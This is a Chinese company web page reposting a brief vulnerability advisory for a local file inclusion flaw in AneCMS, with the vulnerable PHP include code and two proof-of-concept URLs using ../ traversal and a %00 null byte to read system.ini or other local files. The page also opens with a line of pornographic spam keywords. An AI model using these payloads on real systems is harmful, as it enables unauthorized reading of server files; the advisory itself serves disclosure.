欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

<kbd id="529w2"></kbd>

<bdo id="529w2"><table id="529w2"><b id="529w2"></b></table></bdo>

QQ 咨詢：361652718 513960520

知識(shí)學(xué)堂

·聯(lián)系電話:+86.023-75585550
·聯(lián)系傳真:+86.023-75585550
·24小時(shí)手機(jī):13896886023
·QQ 咨詢：361652718 513960520

當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 網(wǎng)站建設(shè)知識(shí)

AneCMS v.2e2c583本地文件包含缺陷及修復(fù)

更新時(shí)間：2012-03-30 | 發(fā)布人：本站 | 點(diǎn)擊率：372 次

標(biāo)題: AneCMS v.2e2c583 LFI exploit

作者Author: I2sec-PJH

軟件開發(fā)網(wǎng)站: https://github.com/AneGroup/AneCMS

影響版本: v.2e2c583

概述

source of index.php頁(yè)面存在缺陷

代碼分析如下

1. if(isset($_GET['p']))

2. include './pages/'.$_GET['p'].'.php';

3. else

4. include './pages/dash.php';

測(cè)試證明

http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00

http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00

提供修復(fù)：

過濾

分享到：

QQ空間

新浪微博

開心網(wǎng)

人人網(wǎng)

下一篇：黑客Web欺騙的工作原理和解決方案
上一篇：.svn目錄未設(shè)權(quán)限限制的漏洞利用總結(jié)(含修復(fù)方案)

相關(guān)文章

網(wǎng)盾科技
正和文印
酉陽(yáng)新三星
酉陽(yáng)力得電器
點(diǎn)訊網(wǎng)
善配資訊網(wǎng)
谷歌搜索
百度收錄
名站在線
百度搜索
114名站導(dǎo)航網(wǎng)

歡迎PR>=3的同行網(wǎng)站與我們交換友情鏈接：

點(diǎn)擊這里給我發(fā)消息

Copyright 2011 - 2015 m.washop.cn All Rights Reserved
重慶指間世界科技有限公司版權(quán)所有電話：023-75585550,13098706767,13896886023
地址：重慶市酉陽(yáng)縣桃花源南路241號(hào)
渝ICP備19008661號(hào)

渝公網(wǎng)安備 50024202000196號(hào)

<meter id="zc5vi"><td id="zc5vi"></td></meter>

<nobr id="zc5vi"><rp id="zc5vi"></rp></nobr>